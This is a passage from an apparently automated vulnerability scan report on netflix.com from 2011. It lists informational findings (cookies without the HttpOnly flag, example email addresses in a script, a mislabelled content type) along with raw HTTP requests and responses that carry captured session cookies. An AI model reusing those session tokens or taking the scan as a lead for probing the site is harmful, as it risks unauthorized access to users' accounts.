miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; vstCnt=1~1~1313414669406
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:24:50 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:24:51 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313439891610; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:24:51 GMT; Path=/ Set-Cookie: nflxsid=112.1313439891610; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:24:51 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439891614~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:24:51 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4OTE2MTQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:24:51 GMT; Path=/ Vary: Accept-Encoding Content-Length: 28638 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313439891617, serverBeforeHtml: 1313439891617 };</script> <meta h...[SNIP]...
5.11. http://www.netflix.com/NetflixReadyDevices
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/NetflixReadyDevices
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440302429; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440301383~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ nflxsid=112.1313440302430; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440302433~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzMDI0MzQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:42 GMT; Path=/ vstCnt=1~1~1313415102436; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /NetflixReadyDevices?lnkce=nrd-o&lnkctr=nmf_nfrd&trkid=496634 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; lastHitTime=1313440265208; nflxsid=112.1313440265209; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440265212~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAyNjUyMTM6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313415065215; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:31:41 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:31:42 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440302429; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440301383~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Set-Cookie: nflxsid=112.1313440302430; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:42 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440302433~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzMDI0MzQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:42 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415102436; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Vary: Accept-Encoding Content-Length: 18784 <!DOCTYPE HTML> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript">var RoundTripIn...[SNIP]...
5.12. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440370951; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440344198~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ nflxsid=112.1313440370951; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440370955~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzNzA5NTU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:32:50 GMT; Path=/ vstCnt=1~1~1313415170958; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/AllGenresList User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; lastHitTime=1313440027472; nflxsid=112.1313440027472; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:32:50 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:32:50 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440370951; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440344198~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ Set-Cookie: nflxsid=112.1313440370951; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:32:50 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440370955~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzNzA5NTU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:32:50 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415170958; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ Vary: Accept-Encoding Content-Length: 41456 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440370951, serverBeforeHtml: 1313440370959 };</script> <meta h...[SNIP]...
5.13. http://www.netflix.com/clickstats
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/clickstats
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440044319; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:24 GMT; Path=/ nflxsid=112.1313440044320; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /clickstats HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/ContactUs Content-Length: 94 Origin: http://www.netflix.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440035342; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440035342 page=ClickStats.ContactUs&href=https%3A%2F%2Fwww.netflix.com%2FBillingActivity%3Flnkctr%3DcuBH
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:27:23 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Location: http://www.netflix.com/entryTrap.jsp?why=hyperactiveSet-Cookie: lastHitTime=1313440044319; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:24 GMT; Path=/ Set-Cookie: nflxsid=112.1313440044320; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Cache-Control: private Content-Length: 0 Content-Type: text/plain
6. Email addresses disclosed
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/layout/jscript/staticlib.js
Issue detail
The following email addresses were disclosed in the response:Cindy@aol.com James_Moore@yahoo.co.uk John@yahoo.com sara.smith@hotmail.com
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Request
GET /layout/jscript/staticlib.js?v=965158 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/MediaCenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; vstCnt=1~1~1313414669406; lastHitTime=1313439890544; nflxsid=112.1313439890544; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4OTA1NDg6OnRjdz0xJmNxcz06"
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:24:53 GMT Server: Apache Last-Modified: Fri, 05 Aug 2011 20:54:24 GMT Accept-Ranges: bytes Vary: Accept-Encoding Expires: Thu, 15 Apr 2020 20:00:00 GMT Cache-Control: private Content-Length: 1884 Content-Type: application/x-javascript var COUNTRY_US=1;var COUNTRY_UK=2;var USStrings=new Array();var UKStrings=new Array();var LOCALE=0;var CS_PHONE=1;var POSTAL_SERVIEW_NAME=2;var POSTAL_CODE_TERM=3;var TAX_TEXT=4;var CS_HOURS=5;var CS_...[SNIP]... ings[EXPIRATION_TERM]="Expiration";UKStrings[EXPIRATION_TERM]="Expiry";USStrings[EXPIRATION_TERM_LOWERCASE]="expiration";UKStrings[EXPIRATION_TERM_LOWERCASE]="expiry";USStrings[EXAMPLE_EMAIL_ADDRESS]="Cindy@aol.com or John@yahoo.com ";UKStrings[EXAMPLE_EMAIL_ADDRESS]="James_Moore@yahoo.co.uk or sara.smith@hotmail.com ";USStrings[SHIPPING_TERM]="Shipping";UKStrings[SHIPPING_TERM]="Delivery";USStrings[DUE_DATE_TERM]="Due Date";UKStrings[DUE_DATE_TERM]="Return-By Date";USStrings[NUMBER1_TERM]="#1";UKStrings[NUMBER1_TE...[SNIP]...
7. Content type incorrectly stated
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.netflix.com
Path:
/NetflixReadyDevices
Issue detail
The response contains the following Content-type statement:Content-Type: text/html;charset=UTF-8 The response states that it contains HTML . However, it actually appears to contain JSON .
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /NetflixReadyDevices?cid=Home+Theater&actionMethod=json HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/NetflixReadyDevices?cid=Home+Theater X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; lastHitTime=1313440301377; nflxsid=112.1313440301377; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440301383~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzMDEzODM6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313415101386; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:31:50 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:31:51 GMTContent-Type: text/html;charset=UTF-8 Set-Cookie: lastHitTime=1313440311003; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440309896~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:51 GMT; Path=/ Set-Cookie: nflxsid=112.1313440311004; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:51 GMT; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440311008~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:51 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzMTEwMDg6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:51 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415111011; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:51 GMT; Path=/ Vary: Accept-Encoding Content-Length: 7436 {"html":"\n \n\n\n\n\n\n\n\n \n \n\n <ol id=\"nrd-list\">\n \n \n \n \n\n <li class=\"nrd-row clearfix\">\n ...[SNIP]...
Report generated by XSS.CX at Mon Aug 15 15:05:11 GMT-06:00 2011.